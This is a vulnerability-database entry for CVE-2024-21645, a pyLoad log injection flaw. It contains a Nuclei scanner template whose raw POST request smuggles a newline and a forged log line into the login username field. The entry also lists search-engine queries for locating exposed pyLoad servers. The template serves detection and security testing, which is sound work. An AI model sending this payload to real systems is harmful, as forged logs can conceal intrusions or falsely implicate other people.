| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-21645 | 6 Jan 202400:58 | – | circl | |
| pyload injection vulnerability | 8 Jan 202400:00 | – | cnnvd | |
| CVE-2024-21645 | 8 Jan 202413:20 | – | cve | |
| CVE-2024-21645 pyLoad Log Injection | 8 Jan 202413:20 | – | cvelist | |
| pyload Log Injection vulnerability | 8 Jan 202415:29 | – | github | |
| CVE-2024-21645 | 8 Jan 202414:15 | – | nvd | |
| CVE-2024-21645 pyLoad Log Injection | 8 Jan 202413:20 | – | osv | |
| GHSA-GHMW-RWH8-6QMR pyload Log Injection vulnerability | 8 Jan 202415:29 | – | osv | |
| Design/Logic Flaw | 8 Jan 202414:15 | – | prion | |
| CVE-2024-21645 | 23 May 202509:09 | – | redhatcve |
id: CVE-2024-21645
info:
name: pyload - Log Injection
author: isacaya
severity: medium
description: |
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
reference:
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2024-21645
cwe-id: CWE-74
epss-score: 0.24513
epss-percentile: 0.97613
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: pyload
product: pyload
shodan-query:
- "title:\"pyload\""
- http.title:"login - pyload"
- http.html:"pyload"
- http.title:"pyload"
fofa-query:
- title="login - pyload"
- body="pyload"
- title="pyload"
google-query:
- intitle:"login - pyload"
- intitle:"pyload"
zoomeye-query: app="pyLoad"
tags: cve,cve2024,pyload,authenticated,injection,vuln
variables:
str: "{{rand_base(6)}}"
http:
- raw:
- |
POST /login?next={{RootURL}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
do=login&username={{randstr}}\'%0a[1970-01-01 00:00:00] INJECTED {{str}} THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login
- |
POST /login?next={{RootURL}}/logs HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
do=login&username={{username}}&password={{password}}&submit=Login
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<td>1970-01-01 00:00:00</td><td class="loglevel">INJECTED</td><td class="logsource">{{str}}</td><td>THIS ENTRY HAS BEEN INJECTED'</td>'
- type: status
status:
- 200
# digest: 4b0a00483046022100cd35a76366714353325a25596798ae645456fdd3e7f0c9d75b1404bc9a361e56022100ca3f6fee85a3875118a9eeff9847bcba31fb59a26eb153a9f25551cab9f478e3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation